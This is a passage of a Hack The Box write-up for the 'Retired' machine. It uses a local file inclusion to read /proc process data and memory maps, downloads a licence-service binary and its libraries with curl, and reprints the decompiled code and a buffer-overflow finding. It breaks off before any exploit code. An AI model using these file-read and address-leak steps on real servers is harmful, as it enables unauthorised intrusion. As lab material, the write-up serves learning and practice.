Skip to main content

Running Services

Instead of fuzzing every process ID, we can simply query for /proc/sched_debug to see the various running processes.

The output is shown here:

> http://10.10.11.154/index.php?page=/proc/sched_debug

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 11 Jun 2022 13:34:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 26387

Sched Debug Version: v0.11, 5.10.0-11-amd64 #1
ktime : 8328923.855779
sched_clk : 8328949.808512
cpu_clk : 8328910.610283
jiffies : 4296974500
sched_clock_stable() : 1

sysctl_sched
.sysctl_sched_latency : 12.000000
.sysctl_sched_min_granularity : 1.500000
.sysctl_sched_wakeup_granularity : 2.000000
.sysctl_sched_child_runs_first : 0
.sysctl_sched_features : 16722747
.sysctl_sched_tunable_scaling : 1 (logarithmic)

cpu#0, 2994.374 MHz
.nr_running : 1
.nr_switches : 990600
.nr_uninterruptible : 27
.next_balance : 4296.974497
.curr->pid : 2605
.clock : 8328910.410439
.clock_task : 8328910.410439
.avg_idle : 882220
.max_idle_balance_cost : 500000

cfs_rq[0]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 71865.895248
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : 0.000000
.nr_spread_over : 0
.nr_running : 1
.load : 1048576
.load_avg : 1
.runnable_avg : 1
.util_avg : 0
.util_est_enqueued : 8
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_avg : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0

rt_rq[0]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.000000
.rt_runtime : 950.000000

dl_rq[0]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0

runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
S systemd 1 71837.344269 3721 120 0.000000 2651.158484 0.000000 0 0 /
I rcu_gp 3 13.991018 2 100 0.000000 0.007684 0.000000 0 0 /
I rcu_par_gp 4 15.991501 2 100 0.000000 0.004448 0.000000 0 0 /
I kworker/0:0H 6 726.721624 4 100 0.000000 0.032020 0.000000 0 0 /
I mm_percpu_wq 9 22.747130 2 100 0.000000 0.003767 0.000000 0 0 /
S rcu_tasks_rude_ 10 24.749343 2 120 0.000000 0.003487 0.000000 0 0 /
S rcu_tasks_trace 11 26.750893 2 120 0.000000 0.003485 0.000000 0 0 /
S ksoftirqd/0 12 71797.040167 44805 120 0.000000 768.053857 0.000000 0 0 /
I rcu_sched 13 71859.964718 124724 120 0.000000 1168.216690 0.000000 0 0 /
S migration/0 14 0.000000 2115 0 0.000000 42.679889 0.000000 0 0 /
S cpuhp/0 15 2851.402188 10 120 0.000000 0.218630 0.000000 0 0 /
S kdevtmpfs 23 4442.398563 128 120 0.000000 1.030105 0.000000 0 0 /
I netns 24 60.629177 2 100 0.000000 0.006492 0.000000 0 0 /
S kauditd 25 2809.086522 7 120 0.000000 1.581827 0.000000 0 0 /
S khungtaskd 26 71560.037243 70 120 0.000000 7.996685 0.000000 0 0 /
S oom_reaper 27 78.752269 2 120 0.000000 0.000000 0.000000 0 0 /
I writeback 28 84.752266 2 100 0.000000 0.000000 0.000000 0 0 /
S kcompactd0 29 71844.543537 16268 120 0.000000 279.627256 0.000000 0 0 /
S ksmd 30 96.752260 2 125 0.000000 0.000000 0.000000 0 0 /
S khugepaged 31 71865.895248 1418 139 0.000000 179.472233 0.000000 0 0 /
I kintegrityd 49 405.507229 2 100 0.000000 0.000000 0.000000 0 0 /
I kblockd 50 411.507226 2 100 0.000000 0.000000 0.000000 0 0 /
I edac-poller 52 670.459560 2 100 0.000000 0.029385 0.000000 0 0 /
I kworker/0:1H 54 71837.046051 4133 100 0.000000 91.271981 0.000000 0 0 /
S kswapd0 56 1790.815695 3 120 0.000000 0.042088 0.000000 0 0 /
I kthrotld 57 1595.067502 2 100 0.000000 0.019697 0.000000 0 0 /
S irq/24-pciehp 58 0.000000 2 49 0.000000 0.038592 0.000000 0 0 /
S irq/26-pciehp 60 0.000000 2 49 0.000000 0.055785 0.000000 0 0 /
S irq/28-pciehp 62 0.000000 2 49 0.000000 0.031389 0.000000 0 0 /
S irq/30-pciehp 64 0.000000 2 49 0.000000 0.034485 0.000000 0 0 /
S irq/32-pciehp 66 0.000000 2 49 0.000000 0.035227 0.000000 0 0 /
S irq/34-pciehp 68 0.000000 2 49 0.000000 0.069511 0.000000 0 0 /
S irq/36-pciehp 70 0.000000 2 49 0.000000 0.028994 0.000000 0 0 /
S irq/38-pciehp 72 0.000000 2 49 0.000000 0.030697 0.000000 0 0 /
S irq/40-pciehp 74 0.000000 2 49 0.000000 0.038842 0.000000 0 0 /
S irq/42-pciehp 76 0.000000 2 49 0.000000 0.044073 0.000000 0 0 /
S irq/44-pciehp 78 0.000000 2 49 0.000000 0.035417 0.000000 0 0 /
S irq/46-pciehp 80 0.000000 2 49 0.000000 0.058559 0.000000 0 0 /
S irq/48-pciehp 82 0.000000 2 49 0.000000 0.121949 0.000000 0 0 /
S irq/50-pciehp 84 0.000000 2 49 0.000000 0.051086 0.000000 0 0 /
S irq/52-pciehp 86 0.000000 2 49 0.000000 0.035327 0.000000 0 0 /
S irq/54-pciehp 88 0.000000 2 49 0.000000 0.035377 0.000000 0 0 /
I acpi_thermal_pm 90 1730.533642 2 100 0.000000 0.031820 0.000000 0 0 /
I ipv6_addrconf 92 1736.094615 2 100 0.000000 0.034797 0.000000 0 0 /
I kstrp 101 1783.567528 2 100 0.000000 0.028925 0.000000 0 0 /
I zswap-shrink 104 1837.710474 2 100 0.000000 0.040245 0.000000 0 0 /
I kworker/u5:0 105 1841.735155 2 100 0.000000 0.027782 0.000000 0 0 /
S scsi_eh_2 159 2370.536546 26 120 0.000000 0.424659 0.000000 0 0 /
S scsi_eh_3 161 2370.524342 26 120 0.000000 0.364995 0.000000 0 0 /
S scsi_eh_4 163 2370.506481 26 120 0.000000 0.331993 0.000000 0 0 /
S scsi_eh_6 167 2370.457376 26 120 0.000000 0.282199 0.000000 0 0 /
S scsi_eh_7 169 2370.496880 26 120 0.000000 0.437710 0.000000 0 0 /
S scsi_eh_8 171 2370.548136 26 120 0.000000 0.384480 0.000000 0 0 /
S scsi_eh_9 173 2370.493685 26 120 0.000000 0.396994 0.000000 0 0 /
S scsi_eh_10 175 2370.795409 26 120 0.000000 0.618389 0.000000 0 0 /
S scsi_eh_13 180 2370.558677 26 120 0.000000 0.391695 0.000000 0 0 /
I mpt_poll_0 183 2079.041144 2 100 0.000000 0.011301 0.000000 0 0 /
S scsi_eh_15 185 2381.755074 4 120 0.000000 11.770674 0.000000 0 0 /
I scsi_tmf_14 186 2079.044701 2 100 0.000000 0.020448 0.000000 0 0 /
I scsi_tmf_15 187 2083.040660 2 100 0.000000 0.009488 0.000000 0 0 /
I mpt/0 188 2087.047587 2 100 0.000000 0.016801 0.000000 0 0 /
S scsi_eh_16 189 2370.510919 26 120 0.000000 0.342273 0.000000 0 0 /
I scsi_tmf_16 191 2087.051306 2 100 0.000000 0.006472 0.000000 0 0 /
I scsi_tmf_17 193 2094.086926 2 100 0.000000 0.022543 0.000000 0 0 /
I scsi_tmf_18 195 2104.130808 2 100 0.000000 0.025187 0.000000 0 0 /
I scsi_tmf_19 197 2114.172475 2 100 0.000000 0.022472 0.000000 0 0 /
I scsi_tmf_20 199 2124.208783 2 100 0.000000 0.021270 0.000000 0 0 /
I scsi_tmf_21 201 2134.253755 2 100 0.000000 0.022812 0.000000 0 0 /
I scsi_tmf_22 203 2144.295063 2 100 0.000000 0.023014 0.000000 0 0 /
I scsi_tmf_23 205 2154.337342 2 100 0.000000 0.023073 0.000000 0 0 /
S scsi_eh_24 206 2370.491431 26 120 0.000000 0.333634 0.000000 0 0 /
I scsi_tmf_24 207 2164.377726 2 100 0.000000 0.022462 0.000000 0 0 /
S scsi_eh_25 208 2370.566941 26 120 0.000000 0.373068 0.000000 0 0 /
I scsi_tmf_25 209 2172.415950 2 100 0.000000 0.019797 0.000000 0 0 /
I scsi_tmf_26 211 2182.464633 2 100 0.000000 0.024276 0.000000 0 0 /
I scsi_tmf_27 213 2190.514666 2 100 0.000000 0.032881 0.000000 0 0 /
S scsi_eh_28 214 2370.457306 26 120 0.000000 0.273262 0.000000 0 0 /
I scsi_tmf_28 215 2200.557066 2 100 0.000000 0.022523 0.000000 0 0 /
S scsi_eh_29 216 2370.473096 26 120 0.000000 0.276820 0.000000 0 0 /
S scsi_eh_30 218 2370.457818 26 120 0.000000 0.280758 0.000000 0 0 /
I scsi_tmf_30 219 2211.642071 2 100 0.000000 0.059151 0.000000 0 0 /
I scsi_tmf_31 221 2211.645798 2 100 0.000000 0.008546 0.000000 0 0 /
S scsi_eh_32 252 2380.927228 2 120 0.000000 0.029265 0.000000 0 0 /
I scsi_tmf_32 253 2384.948763 2 100 0.000000 0.023794 0.000000 0 0 /
S jbd2/sda1-8 284 71837.260091 4137 120 0.000000 198.594561 0.000000 0 0 /
I ext4-rsv-conver 285 2497.825649 3 100 0.000000 0.023003 0.000000 0 0 /
I cryptd 403 2859.418337 2 100 0.000000 0.014688 0.000000 0 0 /
S HangDetector 443 71859.944781 8468 120 0.000000 337.418904 0.000000 0 0 /
S gmain 453 18974.180792 146 120 0.000000 1.609474 0.000000 0 0 /
S activate_licens 423 43189.343856 13 120 0.000000 4.588997 0.000000 0 0 /
S cron 424 71837.542301 309 120 0.000000 72.941778 0.000000 0 0 /
S dbus-daemon 426 71837.272244 1819 120 0.000000 438.606934 0.000000 0 0 /
S in:imklog 436 19010.272129 17 120 0.000000 3.132444 0.000000 0 0 /
S systemd-logind 433 71837.162047 1889 120 0.000000 363.640098 0.000000 0 0 /
S php-fpm7.4 567 71859.931656 9365 120 0.000000 534.538266 0.000000 0 0 /
S nginx 574 71860.262147 316551 120 0.000000 37024.521161 0.000000 0 0 /
S nginx 576 69993.750780 300948 120 0.000000 33940.926945 0.000000 0 0 /
S sshd 577 50199.398838 167 120 0.000000 35.134118 0.000000 0 0 /
S chronyd 580 69320.796637 58 120 0.000000 8.720779 0.000000 0 0 /
I kworker/u4:3 1352 71837.298964 2583 120 0.000000 129.186989 0.000000 0 0 /
I kworker/0:0 1946 71859.922900 6198 120 0.000000 152.716244 0.000000 0 0 /
S php-fpm7.4 2603 71797.489080 27397 120 0.000000 1247.112713 0.000000 0 0 /
S php-fpm7.4 2604 71797.325252 25102 120 0.000000 1164.573565 0.000000 0 0 /
>R php-fpm7.4 2605 71859.928220 17669 120 0.000000 851.221761 0.000000 0 0 /
I kworker/0:2 2863 71353.291048 13 120 0.000000 0.142359 0.000000 0 0 /
I kworker/u4:2 2941 71792.387338 124 120 0.000000 7.232428 0.000000 0 0 /
I kworker/0:1 3010 71729.804003 7 120 0.000000 0.049663 0.000000 0 0 /
S cron 3046 71843.640205 2 120 0.000000 5.197869 0.000000 0 0 /
S sleep 3048 71850.497951 1 120 0.000000 0.857749 0.000000 0 0 /

cpu#1, 2994.374 MHz
.nr_running : 0
.nr_switches : 1622727
.nr_uninterruptible : -27
.next_balance : 4296.974501
.curr->pid : 0
.clock : 8328908.728374
.clock_task : 8328908.728374
.avg_idle : 1000000
.max_idle_balance_cost : 500000

cfs_rq[1]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 68991.880211
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : -2874.015037
.nr_spread_over : 0
.nr_running : 0
.load : 0
.load_avg : 3
.runnable_avg : 3
.util_avg : 3
.util_est_enqueued : 0
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_avg : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0

rt_rq[1]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.017262
.rt_runtime : 950.000000

dl_rq[1]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0

runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-------------------------------------------------------------------------------------------------------------
S kthreadd 2 68822.597441 300 120 0.000000 9.763644 0.000000 0 0 /
S cpuhp/1 16 1150.408667 10 120 0.000000 0.145613 0.000000 0 0 /
S migration/1 17 0.000000 2095 0 0.000000 157.674233 0.000000 0 0 /
S ksoftirqd/1 18 68954.951546 46067 120 0.000000 765.112264 0.000000 0 0 /
I kworker/1:0H 20 89.544035 5 100 0.000000 0.045205 0.000000 0 0 /
I blkcg_punt_bio 51 8.957852 2 100 0.000000 0.009017 0.000000 0 0 /
I devfreq_wq 53 14.962215 2 100 0.000000 0.005902 0.000000 0 0 /
S irq/25-pciehp 59 0.000000 3 49 0.000000 0.052429 0.000000 0 0 /
S irq/27-pciehp 61 0.000000 3 49 0.000000 0.051939 0.000000 0 0 /
S irq/29-pciehp 63 0.000000 3 49 0.000000 0.060313 0.000000 0 0 /
S irq/31-pciehp 65 0.000000 3 49 0.000000 0.065972 0.000000 0 0 /
S irq/33-pciehp 67 0.000000 3 49 0.000000 0.053039 0.000000 0 0 /
S irq/35-pciehp 69 0.000000 3 49 0.000000 0.047347 0.000000 0 0 /
S irq/37-pciehp 71 0.000000 3 49 0.000000 0.050257 0.000000 0 0 /
S irq/39-pciehp 73 0.000000 3 49 0.000000 0.056536 0.000000 0 0 /
S irq/41-pciehp 75 0.000000 3 49 0.000000 0.063369 0.000000 0 0 /
S irq/43-pciehp 77 0.000000 3 49 0.000000 0.091153 0.000000 0 0 /
S irq/45-pciehp 79 0.000000 3 49 0.000000 0.061244 0.000000 0 0 /
S irq/47-pciehp 81 0.000000 3 49 0.000000 0.719377 0.000000 0 0 /
S irq/49-pciehp 83 0.000000 3 49 0.000000 0.064271 0.000000 0 0 /
S irq/51-pciehp 85 0.000000 3 49 0.000000 0.065853 0.000000 0 0 /
S irq/53-pciehp 87 0.000000 3 49 0.000000 0.089158 0.000000 0 0 /
S irq/55-pciehp 89 0.000000 3 49 0.000000 0.056649 0.000000 0 0 /
I kworker/1:1H 91 68822.561973 1557 100 0.000000 43.174418 0.000000 0 0 /
I ata_sff 153 342.417492 2 100 0.000000 0.004609 0.000000 0 0 /
S scsi_eh_0 155 494.693874 26 120 0.000000 0.413033 0.000000 0 0 /
I scsi_tmf_0 156 354.659230 2 100 0.000000 0.007374 0.000000 0 0 /
S scsi_eh_1 157 494.762766 26 120 0.000000 0.391347 0.000000 0 0 /
I scsi_tmf_1 158 362.664780 2 100 0.000000 0.006050 0.000000 0 0 /
I scsi_tmf_2 160 370.670725 2 100 0.000000 0.007092 0.000000 0 0 /
I scsi_tmf_3 162 377.676237 2 100 0.000000 0.006121 0.000000 0 0 /
I scsi_tmf_4 164 385.681575 2 100 0.000000 0.006182 0.000000 0 0 /
S scsi_eh_5 165 494.735917 26 120 0.000000 0.354839 0.000000 0 0 /
I scsi_tmf_5 166 393.687488 2 100 0.000000 0.007834 0.000000 0 0 /
I scsi_tmf_6 168 400.673857 2 100 0.000000 0.006463 0.000000 0 0 /
I scsi_tmf_7 170 408.682107 2 100 0.000000 0.006052 0.000000 0 0 /
I scsi_tmf_8 172 416.687228 2 100 0.000000 0.006002 0.000000 0 0 /
I scsi_tmf_9 174 423.692562 2 100 0.000000 0.005900 0.000000 0 0 /
I scsi_tmf_10 176 431.699136 2 100 0.000000 0.009437 0.000000 0 0 /
S scsi_eh_11 177 494.708393 26 120 0.000000 0.420608 0.000000 0 0 /
S scsi_eh_12 178 500.487979 4 120 0.000000 11.446287 0.000000 0 0 /
I scsi_tmf_11 179 436.543532 2 100 0.000000 0.007644 0.000000 0 0 /
I scsi_tmf_12 181 439.544999 2 100 0.000000 0.009950 0.000000 0 0 /
I scsi_tmf_13 182 442.537038 2 100 0.000000 0.007463 0.000000 0 0 /
S scsi_eh_14 184 494.707942 26 120 0.000000 0.327014 0.000000 0 0 /
S scsi_eh_17 192 494.716610 26 120 0.000000 0.481273 0.000000 0 0 /
S scsi_eh_18 194 494.708010 26 120 0.000000 0.365753 0.000000 0 0 /
S scsi_eh_19 196 494.718584 26 120 0.000000 0.422023 0.000000 0 0 /
S scsi_eh_20 198 494.770066 26 120 0.000000 0.411190 0.000000 0 0 /
S scsi_eh_21 200 494.721246 26 120 0.000000 0.372337 0.000000 0 0 /
S scsi_eh_22 202 494.703865 26 120 0.000000 0.341702 0.000000 0 0 /
S scsi_eh_23 204 494.709874 26 120 0.000000 0.338764 0.000000 0 0 /
S scsi_eh_26 210 494.800002 26 120 0.000000 0.395429 0.000000 0 0 /
S scsi_eh_27 212 495.141935 26 120 0.000000 0.732814 0.000000 0 0 /
I scsi_tmf_29 217 479.432993 2 100 0.000000 0.005560 0.000000 0 0 /
S scsi_eh_31 220 494.785747 26 120 0.000000 0.417502 0.000000 0 0 /
S systemd-journal 334 68986.056612 7423 120 0.000000 1202.272768 0.000000 0 0 /
S systemd-udevd 351 68934.220691 758 120 0.000000 121.843371 0.000000 0 0 /
S irq/16-vmwgfx 393 0.000000 34084 49 0.000000 646.621312 0.000000 0 0 /
I ttm_swap 394 1109.666762 2 100 0.000000 0.008416 0.000000 0 0 /
S card0-crtc0 395 0.000000 2 49 0.000000 0.005209 0.000000 0 0 /
S card0-crtc1 396 0.000000 2 49 0.000000 0.003327 0.000000 0 0 /
S card0-crtc2 397 0.000000 2 49 0.000000 0.002734 0.000000 0 0 /
S card0-crtc3 398 0.000000 2 49 0.000000 0.002545 0.000000 0 0 /
S card0-crtc4 399 0.000000 2 49 0.000000 0.002515 0.000000 0 0 /
S card0-crtc5 400 0.000000 2 49 0.000000 0.002585 0.000000 0 0 /
S card0-crtc6 401 0.000000 2 49 0.000000 0.002475 0.000000 0 0 /
S card0-crtc7 402 0.000000 2 49 0.000000 0.002625 0.000000 0 0 /
S VGAuthService 405 3252.579478 118 120 0.000000 26.094153 0.000000 0 0 /
S vmtoolsd 407 68986.736986 96071 120 0.000000 8179.282273 0.000000 0 0 /
S rsyslogd 430 67944.338994 46 120 0.000000 8.070585 0.000000 0 0 /
S in:imuxsock 435 68984.519610 4064 120 0.000000 136.013100 0.000000 0 0 /
S rs:main Q:Reg 437 68984.518317 4088 120 0.000000 128.380770 0.000000 0 0 /
S hwmon1 520 3765.479041 4 120 0.000000 0.022142 0.000000 0 0 /
S agetty 570 14532.873656 7 120 0.000000 4.224591 0.000000 0 0 /
S nginx 573 3939.801184 6 120 0.000000 0.493405 0.000000 0 0 /
S chronyd 579 66948.226665 51 120 0.000000 5.710881 0.000000 0 0 /
I kworker/1:0 1770 68987.291799 118508 120 0.000000 4181.568487 0.000000 0 0 /
I kworker/u4:0 2341 68529.575316 1213 120 0.000000 78.443746 0.000000 0 0 /
I kworker/u4:1 2838 68529.552352 98 120 0.000000 4.049076 0.000000 0 0 /
I kworker/1:1 2936 68822.706657 14 120 0.000000 0.368192 0.000000 0 0 /
I kworker/1:2 3027 68828.561846 3 120 0.000000 0.026731 0.000000 0 0 /
S sh 3047 68991.880211 3 120 0.000000 1.563492 0.000000 0 0 /

Interestingly, it seems like there is a process activate_license of PID 423. Let's discover more about it.

> http://10.10.11.154/index.php?page=/proc/423/cmdline

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 11 Jun 2022 13:36:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 31

/usr/bin/activate_license1337

Hmm, seems like we found the internal binary running. Let's download it using curl.

> curl http://10.10.11.154/index.php?page=/usr/bin/activate_license --output activate_license

Analysing the binary

Time for pwn? Binary exploitation is totally unexpected! Let's start with a basic checksec.

~/Desktop/HTB/retired ❯ checksec activate_license
[*] '/home/wonyk/Desktop/HTB/retired/activate_license'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled

Seems to be have most of the protections enabled... NX, PIE and RELRO are bad news...

Ghidra

Looking into the binary using Ghidra reveals more of its functionalities.

int main(int argc,char **argv)

{
int iVar1;
__pid_t _Var2;
int *piVar3;
char *pcVar4;
char clientaddr_s [16];
sockaddr_in clientaddr;
socklen_t clientaddrlen;
sockaddr_in server;
uint16_t port;
int clientfd;
int serverfd;

if (argc != 2) {
error("specify port to bind to");
}
iVar1 = __isoc99_sscanf(argv[1],&DAT_00102100,&port);
if (iVar1 == -1) {
piVar3 = __errno_location();
pcVar4 = strerror(*piVar3);
error(pcVar4);
}
printf("[+] starting server listening on port %d\n",(ulong)port);
server.sin_family = 2;
server.sin_addr = htonl(0x7f000001);
server.sin_port = htons(port);
serverfd = socket(2,1,6);
if (serverfd == -1) {
piVar3 = __errno_location();
pcVar4 = strerror(*piVar3);
error(pcVar4);
}
iVar1 = bind(serverfd,(sockaddr *)&server,0x10);
if (iVar1 == -1) {
piVar3 = __errno_location();
pcVar4 = strerror(*piVar3);
error(pcVar4);
}
iVar1 = listen(serverfd,100);
if (iVar1 == -1) {
piVar3 = __errno_location();
pcVar4 = strerror(*piVar3);
error(pcVar4);
}
puts("[+] listening ...");
while( true ) {
while( true ) {
clientfd = accept(serverfd,(sockaddr *)&clientaddr,&clientaddrlen);
if (clientfd != -1) break;
fwrite("Error: accepting client\n",1,0x18,stderr);
}
inet_ntop(2,&clientaddr.sin_addr,clientaddr_s,0x10);
printf("[+] accepted client connection from %s:%d\n",clientaddr_s,(ulong)clientaddr.sin_port);
_Var2 = fork();
if (_Var2 == 0) break;
__sysv_signal(0x11,(__sighandler_t)0x1);
close(clientfd);
}
close(serverfd);
activate_license(clientfd);
/* WARNING: Subroutine does not return */
exit(0);
}

Exploiting

Hmm. Luckily, the binary is simple. It simply listens on a user supplied port (via arguments - 1337 in the case of the box) and saves the input sent via the socket into a database file called license.sqlite.

However, while buffer is only assigned 512 bytes (0x200), the read function does not restrict the number of bytes to read into this variable, allowing for buffer overflow.

BOF

In a normal CTF, we can exploit it directly by connecting via netcat. However, we have to proxy our attacks via the upload web interface now and does not receive any output! How can we leak the necessary addresses to bypass ASLR and PIE? Even if we can leak those addresses, we are not given the libc source files like a normal CTF!

Proc to the rescue

After being stuck for some time, the HTB forum hinted about maximising the LFI via /proc. Immediately, I recalled that GDB retrieves the memory map by querying /proc/<PID>/maps!

> http://10.10.11.154/index.php?page=/proc/423/maps

HTTP/1.1 302 Found
Server: nginx
Date: Sat, 11 Jun 2022 13:50:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 4593

5583d20bf000-5583d20c0000 r--p 00000000 08:01 2408 /usr/bin/activate_license
5583d20c0000-5583d20c1000 r-xp 00001000 08:01 2408 /usr/bin/activate_license
5583d20c1000-5583d20c2000 r--p 00002000 08:01 2408 /usr/bin/activate_license
5583d20c2000-5583d20c3000 r--p 00002000 08:01 2408 /usr/bin/activate_license
5583d20c3000-5583d20c4000 rw-p 00003000 08:01 2408 /usr/bin/activate_license
5583d3b11000-5583d3b32000 rw-p 00000000 00:00 0 [heap]
7f9ed2882000-7f9ed2884000 rw-p 00000000 00:00 0
7f9ed2884000-7f9ed2885000 r--p 00000000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2885000-7f9ed2887000 r-xp 00001000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2887000-7f9ed2888000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2888000-7f9ed2889000 r--p 00003000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed2889000-7f9ed288a000 rw-p 00004000 08:01 3635 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f9ed288a000-7f9ed2891000 r--p 00000000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed2891000-7f9ed28a1000 r-xp 00007000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a1000-7f9ed28a6000 r--p 00017000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a6000-7f9ed28a7000 r--p 0001b000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a7000-7f9ed28a8000 rw-p 0001c000 08:01 3645 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f9ed28a8000-7f9ed28ac000 rw-p 00000000 00:00 0
7f9ed28ac000-7f9ed28bb000 r--p 00000000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed28bb000-7f9ed2955000 r-xp 0000f000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed2955000-7f9ed29ee000 r--p 000a9000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed29ee000-7f9ed29ef000 r--p 00141000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed29ef000-7f9ed29f0000 rw-p 00142000 08:01 3636 /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f9ed29f0000-7f9ed2a15000 r--p 00000000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2a15000-7f9ed2b60000 r-xp 00025000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2b60000-7f9ed2baa000 r--p 00170000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2baa000-7f9ed2bab000 ---p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bab000-7f9ed2bae000 r--p 001ba000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bae000-7f9ed2bb1000 rw-p 001bd000 08:01 3634 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f9ed2bb1000-7f9ed2bb5000 rw-p 00000000 00:00 0
7f9ed2bb5000-7f9ed2bc5000 r--p 00000000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2bc5000-7f9ed2cbd000 r-xp 00010000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cbd000-7f9ed2cf1000 r--p 00108000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cf1000-7f9ed2cf5000 r--p 0013b000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cf5000-7f9ed2cf8000 rw-p 0013f000 08:01 5321 /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f9ed2cf8000-7f9ed2cfa000 rw-p 00000000 00:00 0
7f9ed2cff000-7f9ed2d00000 r--p 00000000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d00000-7f9ed2d20000 r-xp 00001000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d20000-7f9ed2d28000 r--p 00021000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d29000-7f9ed2d2a000 r--p 00029000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d2a000-7f9ed2d2b000 rw-p 0002a000 08:01 3630 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f9ed2d2b000-7f9ed2d2c000 rw-p 00000000 00:00 0
7ffd40921000-7ffd40942000 rw-p 00000000 00:00 0 [stack]
7ffd40974000-7ffd40978000 r--p 00000000 00:00 0 [vvar]
7ffd40978000-7ffd4097a000 r-xp 00000000 00:00 0 [vdso]

Since the binary forks() for every call to insert the code, we can be sure that the binary offset and libc library offset does not change per run. Moreover, the libraries used are listed. We can simply download them.

> curl http://10.10.11.154/index.php?page=/usr/lib/x86_64-linux-gnu/libc-2.31.so --output libc-2.31.so
> curl http://10.10.11.154/index.php?page=/usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6 --output libsqlite3.so.0.8.6

Now, we are set to perform BOF. Let's fire up pwntools.